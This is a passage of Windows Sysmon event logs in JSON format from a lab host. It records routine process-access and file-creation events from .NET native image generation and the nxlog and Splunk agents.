C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:13.779","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1375-5F25-0000-001091050F00}","TargetProcessId":"3468","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8424,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:13.919\r\nProcessGuid: {E2A3D6B1-1375-5F25-0000-001091050F00}\r\nProcessId: 3468\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d8c-0\\System.IdentityModel.Selectors.dll\r\nCreationUtcTime: 2020-08-01 07:02:13.919","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:13.919","ProcessGuid":"{E2A3D6B1-1375-5F25-0000-001091050F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d8c-0\\System.IdentityModel.Selectors.dll","CreationUtcTime":"2020-08-01 07:02:13.919","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8425,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:13.951\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1375-5F25-0000-0010200B0F00}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:13.951","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1375-5F25-0000-0010200B0F00}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8426,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:13.951\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1375-5F25-0000-0010200B0F00}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:13.951","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1375-5F25-0000-0010200B0F00}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8427,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:13.966\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1375-5F25-0000-0010200B0F00}\r\nTargetProcessId: 4980\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:13.966","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1375-5F25-0000-0010200B0F00}","TargetProcessId":"4980","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8428,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:13.966\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:13.966","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8429,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.154\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-0010690F0F00}\r\nTargetProcessId: 2892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.154","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-0010690F0F00}","TargetProcessId":"2892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8430,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.154\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-0010690F0F00}\r\nTargetProcessId: 2892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.154","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-0010690F0F00}","TargetProcessId":"2892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8431,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:14.154\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-0010690F0F00}\r\nTargetProcessId: 2892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:14.154","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-0010690F0F00}","TargetProcessId":"2892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\R